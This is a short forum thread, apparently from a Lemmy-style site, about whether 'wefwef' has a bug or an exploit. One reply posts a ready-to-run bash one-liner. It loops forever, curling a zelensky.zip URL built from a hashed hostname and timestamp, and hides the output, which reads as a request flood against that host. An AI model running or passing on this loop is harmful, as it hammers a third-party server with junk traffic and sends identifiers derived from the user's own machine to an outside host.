Are they just an issue with wefwef or trying to use an exploit

  • gandalftheBlack
    link
    fedilink
    arrow-up
    4
    ·
    edit-2
    1 year ago

    Here’s the one where it uses epoch time (better randomization) and also hides the output of curl

    while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date +%s) | shasum | sed 's/.\{3\}$//' | base64) &> /dev/null ; echo "done."; done